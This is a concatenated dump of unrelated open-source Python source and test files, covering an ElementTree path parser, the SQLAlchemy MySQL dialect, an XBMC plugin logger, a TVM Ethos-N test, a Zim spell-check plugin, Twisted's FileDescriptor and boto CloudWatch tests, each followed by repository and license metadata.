# FIXME: replace with real parser!!! refs:
# http://effbot.org/zone/simple-iterator-parser.htm
# http://javascript.crockford.com/tdop/tdop.html
signature = []
predicate = []
while 1:
token = next()
if token[0] == "]":
break
if token[0] and token[0][:1] in "'\"":
token = "'", token[0][1:-1]
signature.append(token[0] or "-")
predicate.append(token[1])
signature = "".join(signature)
# use signature to determine predicate type
if signature == "@-":
# [@attribute] predicate
key = predicate[1]
def select(context, result):
for elem in result:
if elem.get(key) is not None:
yield elem
return select
if signature == "@-='":
# [@attribute='value']
key = predicate[1]
value = predicate[-1]
def select(context, result):
for elem in result:
if elem.get(key) == value:
yield elem
return select
if signature == "-" and not re.match("\d+$", predicate[0]):
# [tag]
tag = predicate[0]
def select(context, result):
for elem in result:
if elem.find(tag) is not None:
yield elem
return select
if signature == "-='" and not re.match("\d+$", predicate[0]):
# [tag='value']
tag = predicate[0]
value = predicate[-1]
def select(context, result):
for elem in result:
for e in elem.findall(tag):
if "".join(e.itertext()) == value:
yield elem
break
return select
if signature == "-" or signature == "-()" or signature == "-()-":
# [index] or [last()] or [last()-index]
if signature == "-":
index = int(predicate[0]) - 1
else:
if predicate[0] != "last":
raise SyntaxError("unsupported function")
if signature == "-()-":
try:
index = int(predicate[2]) - 1
except ValueError:
raise SyntaxError("unsupported expression")
else:
index = -1
def select(context, result):
parent_map = get_parent_map(context)
for elem in result:
try:
parent = parent_map[elem]
# FIXME: what if the selector is "*" ?
elems = list(parent.findall(elem.tag))
if elems[index] is elem:
yield elem
except (IndexError, KeyError):
pass
return select
raise SyntaxError("invalid predicate")
ops = {
"": prepare_child,
"*": prepare_star,
".": prepare_self,
"..": prepare_parent,
"//": prepare_descendant,
"[": prepare_predicate,
}
_cache = {}
class _SelectorContext:
parent_map = None
def __init__(self, root):
self.root = root
# --------------------------------------------------------------------
##
# Generate all matching objects.
def iterfind(elem, path, namespaces=None):
# compile selector pattern
if path[-1:] == "/":
path = path + "*" # implicit all (FIXME: keep this?)
try:
selector = _cache[path]
except KeyError:
if len(_cache) > 100:
_cache.clear()
if path[:1] == "/":
raise SyntaxError("cannot use absolute path on element")
next = iter(xpath_tokenizer(path, namespaces)).__next__
token = next()
selector = []
while 1:
try:
selector.append(ops[token[0]](next, token))
except StopIteration:
raise SyntaxError("invalid path")
try:
token = next()
if token[0] == "/":
token = next()
except StopIteration:
break
_cache[path] = selector
# execute selector pattern
result = [elem]
context = _SelectorContext(elem)
for select in selector:
result = select(context, result)
return result
##
# Find first matching object.
def find(elem, path, namespaces=None):
try:
return next(iterfind(elem, path, namespaces))
except StopIteration:
return None
##
# Find all matching objects.
def findall(elem, path, namespaces=None):
return list(iterfind(elem, path, namespaces))
##
# Find text for first matching object.
def findtext(elem, path, default=None, namespaces=None):
try:
elem = next(iterfind(elem, path, namespaces))
return elem.text or ""
except StopIteration:
return default
|
gpl-2.0
|
ychen820/microblog
|
flask/lib/python2.7/site-packages/sqlalchemy/dialects/mysql/__init__.py
|
79
|
1171
|
# mysql/__init__.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from . import base, mysqldb, oursql, \
pyodbc, zxjdbc, mysqlconnector, pymysql,\
gaerdbms, cymysql
# default dialect
base.dialect = mysqldb.dialect
from .base import \
BIGINT, BINARY, BIT, BLOB, BOOLEAN, CHAR, DATE, DATETIME, \
DECIMAL, DOUBLE, ENUM, DECIMAL,\
FLOAT, INTEGER, INTEGER, LONGBLOB, LONGTEXT, MEDIUMBLOB, \
MEDIUMINT, MEDIUMTEXT, NCHAR, \
NVARCHAR, NUMERIC, SET, SMALLINT, REAL, TEXT, TIME, TIMESTAMP, \
TINYBLOB, TINYINT, TINYTEXT,\
VARBINARY, VARCHAR, YEAR, dialect
__all__ = (
'BIGINT', 'BINARY', 'BIT', 'BLOB', 'BOOLEAN', 'CHAR', 'DATE', 'DATETIME',
'DECIMAL', 'DOUBLE', 'ENUM', 'DECIMAL', 'FLOAT', 'INTEGER', 'INTEGER',
'LONGBLOB', 'LONGTEXT', 'MEDIUMBLOB', 'MEDIUMINT', 'MEDIUMTEXT', 'NCHAR',
'NVARCHAR', 'NUMERIC', 'SET', 'SMALLINT', 'REAL', 'TEXT', 'TIME',
'TIMESTAMP', 'TINYBLOB', 'TINYINT', 'TINYTEXT', 'VARBINARY', 'VARCHAR',
'YEAR', 'dialect'
)
|
bsd-3-clause
|
sshnaidm/ru
|
script.module.xbmcswift2/lib/xbmcswift2/logger.py
|
34
|
2979
|
'''
xbmcswift2.log
--------------
This module contains the xbmcswift2 logger as well as a convenience
method for creating new loggers.
:copyright: (c) 2012 by Jonathan Beluch
:license: GPLv3, see LICENSE for more details.
'''
import logging
from xbmcswift2 import CLI_MODE
# TODO: Add logging to a file as well when on CLI with lowest threshold
# possible
#fh = logging.FileHandler('log_filename.txt')
#fh.setLevel(logging.DEBUG)
#fh.setFormatter(formatter)
#log.addHandler(fh)
# TODO: Allow a global flag to set logging level when dealing with XBMC
# TODO: Add -q and -v flags to CLI to quiet or enabel more verbose logging
class XBMCFilter(object):
'''A logging filter that streams to STDOUT or to the xbmc log if
running inside XBMC.
'''
python_to_xbmc = {
'DEBUG': 'LOGDEBUG',
'INFO': 'LOGNOTICE',
'WARNING': 'LOGWARNING',
'ERROR': 'LOGERROR',
'CRITICAL': 'LOGSEVERE',
}
xbmc_levels = {
'LOGDEBUG': 0,
'LOGINFO': 1,
'LOGNOTICE': 2,
'LOGWARNING': 3,
'LOGERROR': 4,
'LOGSEVERE': 5,
'LOGFATAL': 6,
'LOGNONE': 7,
}
def __init__(self, prefix):
self.prefix = prefix
def filter(self, record):
'''Returns True for all records if running in the CLI, else returns
True.
When running inside XBMC it calls the xbmc.log() method and prevents
the message from being double printed to STDOUT.
'''
# When running in XBMC, any logged statements will be double printed
# since we are calling xbmc.log() explicitly. Therefore we return False
# so every log message is filtered out and not printed again.
if CLI_MODE:
return True
else:
# Must not be imported until here because of import order issues
# when running in CLI
from xbmcswift2 import xbmc
xbmc_level = XBMCFilter.xbmc_levels.get(
XBMCFilter.python_to_xbmc.get(record.levelname))
xbmc.log('%s%s' % (self.prefix, record.getMessage()), xbmc_level)
return False
if CLI_MODE:
GLOBAL_LOG_LEVEL = logging.INFO
else:
GLOBAL_LOG_LEVEL = logging.DEBUG
def setup_log(name):
'''Returns a logging instance for the provided name. The returned
object is an instance of logging.Logger. Logged messages will be
printed to stderr when running in the CLI, or forwarded to XBMC's
log when running in XBMC mode.
'''
_log = logging.getLogger(name)
_log.setLevel(GLOBAL_LOG_LEVEL)
handler = logging.StreamHandler()
formatter = logging.Formatter(
'%(asctime)s - %(levelname)s - [%(name)s] %(message)s')
handler.setFormatter(formatter)
_log.addHandler(handler)
_log.addFilter(XBMCFilter('[%s] ' % name))
return _log
# The xbmcswift2 log
# Plugin writers should use plugin.log instead.
log = setup_log('xbmcswift2')
|
gpl-2.0
|
dmlc/tvm
|
tests/python/contrib/test_ethosn/test_constant_duplication.py
|
2
|
2958
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Test that constants aren't duplicated for Ethos-N"""
import numpy as np
import tvm
from tvm import relay
from tvm.relay.op.contrib.ethosn import ethosn_available
from . import infrastructure as tei
def _get_model():
"""Return a model and any parameters it may have"""
shape = (1, 4, 4, 4)
kernel_h = 3
kernel_w = 3
out_channels = 8
a = relay.var("a", shape=shape, dtype="uint8")
add_const_value = tvm.nd.array(np.random.randint(0, high=10, size=shape, dtype="uint8"))
add_const = relay.const(add_const_value, "uint8")
a = relay.add(a, add_const)
weight_shape = (kernel_h, kernel_w, shape[3], out_channels)
w = tvm.nd.array(np.random.randint(low=0, high=255, size=weight_shape, dtype="uint8"))
weights = relay.const(w, "uint8")
conv = relay.qnn.op.conv2d(
a,
weights,
input_zero_point=relay.const(0, "int32"),
kernel_zero_point=relay.const(0, "int32"),
input_scale=relay.const(0.3, "float32"),
kernel_scale=relay.const(0.4, "float32"),
kernel_size=(kernel_h, kernel_w),
data_layout="NHWC",
kernel_layout="HWIO",
dilation=(1, 1),
strides=(1, 1),
groups=1,
channels=out_channels,
padding=(0, 0, 0, 0),
out_dtype="int32",
)
b = tvm.nd.array(np.random.randint(0, high=10, size=(out_channels,), dtype="int32"))
biasc = relay.const(b, "int32")
bias = relay.nn.bias_add(conv, biasc, axis=3)
req = relay.qnn.op.requantize(
bias,
relay.const(0.3 * 0.4, "float32"), # input zero scale
relay.const(0, "int32"), # input zero point
relay.const(0.4, "float32"), # output zero scale
relay.const(0, "int32"), # output zero point
out_dtype="uint8",
)
params = {"w": w, "b": b}
return req, params
def test_constant_duplication():
if not ethosn_available():
return
model, params = _get_model()
mod = tei.make_module(model, params)
res = tei.build(mod, params, npu=True, expected_host_ops=1)
for key, value in res.params.items():
assert key == "p0"
assert value.asnumpy().size == 64
|
apache-2.0
|
DarioGT/Zim-QDA
|
zim/plugins/spell.py
|
1
|
4224
|
# -*- coding: utf-8 -*-
# Copyright 2008 Jaap Karssenberg <[email protected]>
'''Spell check plugin based on gtkspell'''
import os
import gobject
from zim.config import get_environ
from zim.plugins import PluginClass
from zim.gui.widgets import ErrorDialog
from zim.signals import SIGNAL_AFTER
try:
import gtkspell
except:
gtkspell = None
ui_xml = '''
<ui>
<menubar name='menubar'>
<menu action='tools_menu'>
<placeholder name='page_tools'>
<menuitem action='toggle_spellcheck'/>
</placeholder>
</menu>
</menubar>
<toolbar name='toolbar'>
<placeholder name='tools'>
<toolitem action='toggle_spellcheck'/>
</placeholder>
</toolbar>
</ui>
'''
ui_toggle_actions = (
# name, stock id, label, accelerator, tooltip, initial state, readonly
('toggle_spellcheck', 'gtk-spell-check', _('Check _spelling'), 'F7', 'Spell check', False, True), # T: menu item
)
class SpellPlugin(PluginClass):
plugin_info = {
'name': _('Spell Checker'), # T: plugin name
'description': _('''\
Adds spell checking support using gtkspell.
This is a core plugin shipping with zim.
'''), # T: plugin description
'author': 'Jaap Karssenberg',
'help': 'Plugins:Spell Checker',
}
plugin_preferences = (
('language', 'string', 'Default Language', ''),
)
def __init__(self, ui):
PluginClass.__init__(self, ui)
self.spell = None
self.uistate.setdefault('active', False)
if self.ui.ui_type == 'gtk':
self.ui.add_toggle_actions(ui_toggle_actions, self)
self.ui.add_ui(ui_xml, self)
self.connectto(self.ui, 'open-page', order=SIGNAL_AFTER)
@classmethod
def check_dependencies(klass):
return (not gtkspell is None), [('gtkspell', not gtkspell is None, True)]
def toggle_spellcheck(self, enable=None):
action = self.actiongroup.get_action('toggle_spellcheck')
if enable is None or enable != action.get_active():
action.activate()
else:
self.do_toggle_spellcheck(enable=enable)
def do_toggle_spellcheck(self, enable=None):
#~ print 'do_toggle_spellcheck', enable
if enable is None:
action = self.actiongroup.get_action('toggle_spellcheck')
enable = action.get_active()
textview = self.ui.mainwindow.pageview.view
if enable:
if self.spell is None:
lang = self.preferences['language'] or None
try:
self.spell = gtkspell.Spell(textview, lang)
except:
lang = lang or get_environ('LANG') or get_environ('LANGUAGE')
ErrorDialog(self.ui, (
_('Could not load spell checking for language: "%s"') % lang,
# T: error message - %s is replaced with language codes like "en", "en_US"m or "nl_NL"
_('This could mean you don\'t have the proper\ndictionaries installed')
# T: error message explanation
) ).run()
return
else:
textview.gtkspell = self.spell # HACK used by hardcoded hook in pageview
else:
pass
else:
if self.spell is None:
pass
else:
if textview.gtkspell \
and textview.gtkspell == self.spell:
textview.gtkspell.detach()
textview.gtkspell = None
self.spell = None
self.uistate['active'] = enable
return False # we can be called from idle event
def on_open_page(self, ui, page, record):
# Assume the old object is detached by hard coded
# hook in TextView, just attach a new one.
# Use idle timer to avoid lag in page loading.
# This hook also synchronizes the state of the toggle with
# the uistate when loading the first page
self.spell = None
if self.uistate['active']:
gobject.idle_add(self.toggle_spellcheck, True)
|
gpl-2.0
|
Donkyhotay/MoonPy
|
twisted/internet/abstract.py
|
12
|
13571
|
# -*- test-case-name: twisted.test.test_abstract -*-
# Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Support for generic select()able objects.
Maintainer: Itamar Shtull-Trauring
"""
from zope.interface import implements
# Twisted Imports
from twisted.python import log, reflect, failure
from twisted.persisted import styles
from twisted.internet import interfaces, main
class FileDescriptor(log.Logger, styles.Ephemeral, object):
"""An object which can be operated on by select().
This is an abstract superclass of all objects which may be notified when
they are readable or writable; e.g. they have a file-descriptor that is
valid to be passed to select(2).
"""
connected = 0
producerPaused = 0
streamingProducer = 0
producer = None
disconnected = 0
disconnecting = 0
_writeDisconnecting = False
_writeDisconnected = False
dataBuffer = ""
offset = 0
SEND_LIMIT = 128*1024
implements(interfaces.IProducer, interfaces.IReadWriteDescriptor,
interfaces.IConsumer, interfaces.ITransport, interfaces.IHalfCloseableDescriptor)
def __init__(self, reactor=None):
if not reactor:
from twisted.internet import reactor
self.reactor = reactor
self._tempDataBuffer = [] # will be added to dataBuffer in doWrite
self._tempDataLen = 0
def connectionLost(self, reason):
"""The connection was lost.
This is called when the connection on a selectable object has been
lost. It will be called whether the connection was closed explicitly,
an exception occurred in an event handler, or the other end of the
connection closed it first.
Clean up state here, but make sure to call back up to FileDescriptor.
"""
self.disconnected = 1
self.connected = 0
if self.producer is not None:
self.producer.stopProducing()
self.producer = None
self.stopReading()
self.stopWriting()
def writeSomeData(self, data):
"""
Write as much as possible of the given data, immediately.
This is called to invoke the lower-level writing functionality, such
as a socket's send() method, or a file's write(); this method
returns an integer or an exception. If an integer, it is the number
of bytes written (possibly zero); if an exception, it indicates the
connection was lost.
"""
raise NotImplementedError("%s does not implement writeSomeData" %
reflect.qual(self.__class__))
def doRead(self):
"""Called when data is avaliable for reading.
Subclasses must override this method. The result will be interpreted
in the same way as a result of doWrite().
"""
raise NotImplementedError("%s does not implement doRead" %
reflect.qual(self.__class__))
def doWrite(self):
"""
Called when data can be written.
A result that is true (which will be a negative number or an
exception instance) indicates that the connection was lost. A false
result implies the connection is still there; a result of 0
indicates no write was done, and a result of None indicates that a
write was done.
"""
if len(self.dataBuffer) - self.offset < self.SEND_LIMIT:
# If there is currently less than SEND_LIMIT bytes left to send
# in the string, extend it with the array data.
self.dataBuffer = buffer(self.dataBuffer, self.offset) + "".join(self._tempDataBuffer)
self.offset = 0
self._tempDataBuffer = []
self._tempDataLen = 0
# Send as much data as you can.
if self.offset:
l = self.writeSomeData(buffer(self.dataBuffer, self.offset))
else:
l = self.writeSomeData(self.dataBuffer)
# There is no writeSomeData implementation in Twisted which returns
# 0, but the documentation for writeSomeData used to claim negative
# integers meant connection lost. Keep supporting this here,
# although it may be worth deprecating and removing at some point.
if l < 0 or isinstance(l, Exception):
return l
if l == 0 and self.dataBuffer:
result = 0
else:
result = None
self.offset += l
# If there is nothing left to send,
if self.offset == len(self.dataBuffer) and not self._tempDataLen:
self.dataBuffer = ""
self.offset = 0
# stop writing.
self.stopWriting()
# If I've got a producer who is supposed to supply me with data,
if self.producer is not None and ((not self.streamingProducer)
or self.producerPaused):
# tell them to supply some more.
self.producerPaused = 0
self.producer.resumeProducing()
elif self.disconnecting:
# But if I was previously asked to let the connection die, do
# so.
return self._postLoseConnection()
elif self._writeDisconnecting:
# I was previously asked to to half-close the connection.
result = self._closeWriteConnection()
self._writeDisconnected = True
return result
return result
def _postLoseConnection(self):
"""Called after a loseConnection(), when all data has been written.
Whatever this returns is then returned by doWrite.
"""
# default implementation, telling reactor we're finished
return main.CONNECTION_DONE
def _closeWriteConnection(self):
# override in subclasses
pass
def writeConnectionLost(self, reason):
# in current code should never be called
self.connectionLost(reason)
def readConnectionLost(self, reason):
# override in subclasses
self.connectionLost(reason)
def write(self, data):
"""Reliably write some data.
The data is buffered until the underlying file descriptor is ready
for writing. If there is more than C{self.bufferSize} data in the
buffer and this descriptor has a registered streaming producer, its
C{pauseProducing()} method will be called.
"""
if isinstance(data, unicode): # no, really, I mean it
raise TypeError("Data must not be unicode")
if not self.connected or self._writeDisconnected:
return
if data:
self._tempDataBuffer.append(data)
self._tempDataLen += len(data)
# If we are responsible for pausing our producer,
if self.producer is not None and self.streamingProducer:
# and our buffer is full,
if len(self.dataBuffer) + self._tempDataLen > self.bufferSize:
# pause it.
self.producerPaused = 1
self.producer.pauseProducing()
self.startWriting()
def writeSequence(self, iovec):
"""Reliably write a sequence of data.
Currently, this is a convenience method roughly equivalent to::
for chunk in iovec:
fd.write(chunk)
It may have a more efficient implementation at a later time or in a
different reactor.
As with the C{write()} method, if a buffer size limit is reached and a
streaming producer is registered, it will be paused until the buffered
data is written to the underlying file descriptor.
"""
if not self.connected or not iovec or self._writeDisconnected:
return
self._tempDataBuffer.extend(iovec)
for i in iovec:
self._tempDataLen += len(i)
# If we are responsible for pausing our producer,
if self.producer is not None and self.streamingProducer:
# and our buffer is full,
if len(self.dataBuffer) + self._tempDataLen > self.bufferSize:
# pause it.
self.producerPaused = 1
self.producer.pauseProducing()
self.startWriting()
def loseConnection(self, _connDone=failure.Failure(main.CONNECTION_DONE)):
"""Close the connection at the next available opportunity.
Call this to cause this FileDescriptor to lose its connection. It will
first write any data that it has buffered.
If there is data buffered yet to be written, this method will cause the
transport to lose its connection as soon as it's done flushing its
write buffer. If you have a producer registered, the connection won't
be closed until the producer is finished. Therefore, make sure you
unregister your producer when it's finished, or the connection will
never close.
"""
if self.connected and not self.disconnecting:
if self._writeDisconnected:
# doWrite won't trigger the connection close anymore
self.stopReading()
self.stopWriting()
self.connectionLost(_connDone)
else:
self.stopReading()
self.startWriting()
self.disconnecting = 1
def loseWriteConnection(self):
self._writeDisconnecting = True
self.startWriting()
def stopReading(self):
"""Stop waiting for read availability.
Call this to remove this selectable from being notified when it is
ready for reading.
"""
self.reactor.removeReader(self)
def stopWriting(self):
"""Stop waiting for write availability.
Call this to remove this selectable from being notified when it is ready
for writing.
"""
self.reactor.removeWriter(self)
def startReading(self):
"""Start waiting for read availability.
"""
self.reactor.addReader(self)
def startWriting(self):
"""Start waiting for write availability.
Call this to have this FileDescriptor be notified whenever it is ready for
writing.
"""
self.reactor.addWriter(self)
# Producer/consumer implementation
# first, the consumer stuff. This requires no additional work, as
# any object you can write to can be a consumer, really.
producer = None
bufferSize = 2**2**2**2
def registerProducer(self, producer, streaming):
"""Register to receive data from a producer.
This sets this selectable to be a consumer for a producer. When this
selectable runs out of data on a write() call, it will ask the producer
to resumeProducing(). When the FileDescriptor's internal data buffer is
filled, it will ask the producer to pauseProducing(). If the connection
is lost, FileDescriptor calls producer's stopProducing() method.
If streaming is true, the producer should provide the IPushProducer
interface. Otherwise, it is assumed that producer provides the
IPullProducer interface. In this case, the producer won't be asked
to pauseProducing(), but it has to be careful to write() data only
when its resumeProducing() method is called.
"""
if self.producer is not None:
raise RuntimeError("Cannot register producer %s, because producer %s was never unregistered." % (producer, self.producer))
if self.disconnected:
producer.stopProducing()
else:
self.producer = producer
self.streamingProducer = streaming
if not streaming:
producer.resumeProducing()
def unregisterProducer(self):
"""Stop consuming data from a producer, without disconnecting.
"""
self.producer = None
def stopConsuming(self):
"""Stop consuming data.
This is called when a producer has lost its connection, to tell the
consumer to go lose its connection (and break potential circular
references).
"""
self.unregisterProducer()
self.loseConnection()
# producer interface implementation
def resumeProducing(self):
assert self.connected and not self.disconnecting
self.startReading()
def pauseProducing(self):
self.stopReading()
def stopProducing(self):
self.loseConnection()
def fileno(self):
"""File Descriptor number for select().
This method must be overridden or assigned in subclasses to
indicate a valid file descriptor for the operating system.
"""
return -1
def isIPAddress(addr):
"""
Determine whether the given string represents an IPv4 address.
@type addr: C{str}
@param addr: A string which may or may not be the decimal dotted
representation of an IPv4 address.
@rtype: C{bool}
@return: C{True} if C{addr} represents an IPv4 address, C{False}
otherwise.
"""
dottedParts = addr.split('.')
if len(dottedParts) == 4:
for octet in dottedParts:
try:
value = int(octet)
except ValueError:
return False
else:
if value < 0 or value > 255:
return False
return True
return False
__all__ = ["FileDescriptor"]
|
gpl-3.0
|
dablak/boto
|
tests/integration/ec2/cloudwatch/test_connection.py
|
22
|
11787
|
# Copyright (c) 2010 Hunter Blanks http://artifex.org/~hblanks/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Initial, and very limited, unit tests for CloudWatchConnection.
"""
import datetime
import time
import unittest
from boto.ec2.cloudwatch import CloudWatchConnection
from boto.ec2.cloudwatch.metric import Metric
# HTTP response body for CloudWatchConnection.describe_alarms
DESCRIBE_ALARMS_BODY = """<DescribeAlarmsResponse xmlns="http://monitoring.amazonaws.com/doc/2010-08-01/">
<DescribeAlarmsResult>
<NextToken>mynexttoken</NextToken>
<MetricAlarms>
<member>
<StateUpdatedTimestamp>2011-11-18T23:43:59.111Z</StateUpdatedTimestamp>
<InsufficientDataActions/>
<StateReasonData>{"version":"1.0","queryDate":"2011-11-18T23:43:59.089+0000","startDate":"2011-11-18T23:30:00.000+0000","statistic":"Maximum","period":60,"recentDatapoints":[1.0,null,null,null,null,null,null,null,null,null,1.0],"threshold":1.0}</StateReasonData>
<AlarmArn>arn:aws:cloudwatch:us-east-1:1234:alarm:FancyAlarm</AlarmArn>
<AlarmConfigurationUpdatedTimestamp>2011-11-18T23:43:58.489Z</AlarmConfigurationUpdatedTimestamp>
<AlarmName>FancyAlarm</AlarmName>
<StateValue>OK</StateValue>
<Period>60</Period>
<OKActions/>
<ActionsEnabled>true</ActionsEnabled>
<Namespace>AcmeCo/Cronjobs</Namespace>
<EvaluationPeriods>15</EvaluationPeriods>
<Threshold>1.0</Threshold>
<Statistic>Maximum</Statistic>
<AlarmActions>
<member>arn:aws:sns:us-east-1:1234:Alerts</member>
</AlarmActions>
<StateReason>Threshold Crossed: 2 datapoints were not less than the threshold (1.0). The most recent datapoints: [1.0, 1.0].</StateReason>
<Dimensions>
<member>
<Name>Job</Name>
<Value>ANiceCronJob</Value>
</member>
</Dimensions>
<ComparisonOperator>LessThanThreshold</ComparisonOperator>
<MetricName>Success</MetricName>
</member>
<member>
<StateUpdatedTimestamp>2011-11-19T08:09:20.655Z</StateUpdatedTimestamp>
<InsufficientDataActions/>
<StateReasonData>{"version":"1.0","queryDate":"2011-11-19T08:09:20.633+0000","startDate":"2011-11-19T08:07:00.000+0000","statistic":"Maximum","period":60,"recentDatapoints":[1.0],"threshold":1.0}</StateReasonData>
<AlarmArn>arn:aws:cloudwatch:us-east-1:1234:alarm:SuprtFancyAlarm</AlarmArn>
<AlarmConfigurationUpdatedTimestamp>2011-11-19T16:20:19.687Z</AlarmConfigurationUpdatedTimestamp>
<AlarmName>SuperFancyAlarm</AlarmName>
<StateValue>OK</StateValue>
<Period>60</Period>
<OKActions/>
<ActionsEnabled>true</ActionsEnabled>
<Namespace>AcmeCo/CronJobs</Namespace>
<EvaluationPeriods>60</EvaluationPeriods>
<Threshold>1.0</Threshold>
<Statistic>Maximum</Statistic>
<AlarmActions>
<member>arn:aws:sns:us-east-1:1234:alerts</member>
</AlarmActions>
<StateReason>Threshold Crossed: 1 datapoint (1.0) was not less than the threshold (1.0).</StateReason>
<Dimensions>
<member>
<Name>Job</Name>
<Value>ABadCronJob</Value>
</member>
</Dimensions>
<ComparisonOperator>GreaterThanThreshold</ComparisonOperator>
<MetricName>Success</MetricName>
</member>
</MetricAlarms>
</DescribeAlarmsResult>
<ResponseMetadata>
<RequestId>f621311-1463-11e1-95c3-312389123</RequestId>
</ResponseMetadata>
</DescribeAlarmsResponse>"""
class CloudWatchConnectionTest(unittest.TestCase):
ec2 = True
def test_build_list_params(self):
c = CloudWatchConnection()
params = {}
c.build_list_params(
params, ['thing1', 'thing2', 'thing3'], 'ThingName%d')
expected_params = {
'ThingName1': 'thing1',
'ThingName2': 'thing2',
'ThingName3': 'thing3'
}
self.assertEqual(params, expected_params)
def test_build_put_params_one(self):
c = CloudWatchConnection()
params = {}
c.build_put_params(params, name="N", value=1, dimensions={"D": "V"})
expected_params = {
'MetricData.member.1.MetricName': 'N',
'MetricData.member.1.Value': 1,
'MetricData.member.1.Dimensions.member.1.Name': 'D',
'MetricData.member.1.Dimensions.member.1.Value': 'V',
}
self.assertEqual(params, expected_params)
def test_build_put_params_multiple_metrics(self):
c = CloudWatchConnection()
params = {}
c.build_put_params(params, name=["N", "M"], value=[1, 2], dimensions={"D": "V"})
expected_params = {
'MetricData.member.1.MetricName': 'N',
'MetricData.member.1.Value': 1,
'MetricData.member.1.Dimensions.member.1.Name': 'D',
'MetricData.member.1.Dimensions.member.1.Value': 'V',
'MetricData.member.2.MetricName': 'M',
'MetricData.member.2.Value': 2,
'MetricData.member.2.Dimensions.member.1.Name': 'D',
'MetricData.member.2.Dimensions.member.1.Value': 'V',
}
self.assertEqual(params, expected_params)
def test_build_put_params_multiple_dimensions(self):
c = CloudWatchConnection()
params = {}
c.build_put_params(params, name="N", value=[1, 2], dimensions=[{"D": "V"}, {"D": "W"}])
expected_params = {
'MetricData.member.1.MetricName': 'N',
'MetricData.member.1.Value': 1,
'MetricData.member.1.Dimensions.member.1.Name': 'D',
'MetricData.member.1.Dimensions.member.1.Value': 'V',
'MetricData.member.2.MetricName': 'N',
'MetricData.member.2.Value': 2,
'MetricData.member.2.Dimensions.member.1.Name': 'D',
'MetricData.member.2.Dimensions.member.1.Value': 'W',
}
self.assertEqual(params, expected_params)
def test_build_put_params_multiple_parameter_dimension(self):
from collections import OrderedDict
self.maxDiff = None
c = CloudWatchConnection()
params = {}
dimensions = [OrderedDict((("D1", "V"), ("D2", "W")))]
c.build_put_params(params,
name="N",
value=[1],
dimensions=dimensions)
expected_params = {
'MetricData.member.1.MetricName': 'N',
'MetricData.member.1.Value': 1,
'MetricData.member.1.Dimensions.member.1.Name': 'D1',
'MetricData.member.1.Dimensions.member.1.Value': 'V',
'MetricData.member.1.Dimensions.member.2.Name': 'D2',
'MetricData.member.1.Dimensions.member.2.Value': 'W',
}
self.assertEqual(params, expected_params)
def test_build_get_params_multiple_parameter_dimension1(self):
from collections import OrderedDict
self.maxDiff = None
c = CloudWatchConnection()
params = {}
dimensions = OrderedDict((("D1", "V"), ("D2", "W")))
c.build_dimension_param(dimensions, params)
expected_params = {
'Dimensions.member.1.Name': 'D1',
'Dimensions.member.1.Value': 'V',
'Dimensions.member.2.Name': 'D2',
'Dimensions.member.2.Value': 'W',
}
self.assertEqual(params, expected_params)
def test_build_get_params_multiple_parameter_dimension2(self):
from collections import OrderedDict
self.maxDiff = None
c = CloudWatchConnection()
params = {}
dimensions = OrderedDict((("D1", ["V1", "V2"]), ("D2", "W"), ("D3", None)))
c.build_dimension_param(dimensions, params)
expected_params = {
'Dimensions.member.1.Name': 'D1',
'Dimensions.member.1.Value': 'V1',
'Dimensions.member.2.Name': 'D1',
'Dimensions.member.2.Value': 'V2',
'Dimensions.member.3.Name': 'D2',
'Dimensions.member.3.Value': 'W',
'Dimensions.member.4.Name': 'D3',
}
self.assertEqual(params, expected_params)
def test_build_put_params_invalid(self):
c = CloudWatchConnection()
params = {}
try:
c.build_put_params(params, name=["N", "M"], value=[1, 2, 3])
except:
pass
else:
self.fail("Should not accept lists of different lengths.")
def test_get_metric_statistics(self):
c = CloudWatchConnection()
m = c.list_metrics()[0]
end = datetime.datetime.now()
start = end - datetime.timedelta(hours=24*14)
c.get_metric_statistics(
3600*24, start, end, m.name, m.namespace, ['Average', 'Sum'])
def test_put_metric_data(self):
c = CloudWatchConnection()
now = datetime.datetime.now()
name, namespace = 'unit-test-metric', 'boto-unit-test'
c.put_metric_data(namespace, name, 5, now, 'Bytes')
# Uncomment the following lines for a slower but more thorough
# test. (Hurrah for eventual consistency...)
#
# metric = Metric(connection=c)
# metric.name = name
# metric.namespace = namespace
# time.sleep(60)
# l = metric.query(
# now - datetime.timedelta(seconds=60),
# datetime.datetime.now(),
# 'Average')
# assert l
# for row in l:
# self.assertEqual(row['Unit'], 'Bytes')
# self.assertEqual(row['Average'], 5.0)
def test_describe_alarms(self):
c = CloudWatchConnection()
def make_request(*args, **kwargs):
class Body(object):
def __init__(self):
self.status = 200
def read(self):
return DESCRIBE_ALARMS_BODY
return Body()
c.make_request = make_request
alarms = c.describe_alarms()
self.assertEquals(alarms.next_token, 'mynexttoken')
self.assertEquals(alarms[0].name, 'FancyAlarm')
self.assertEquals(alarms[0].comparison, '<')
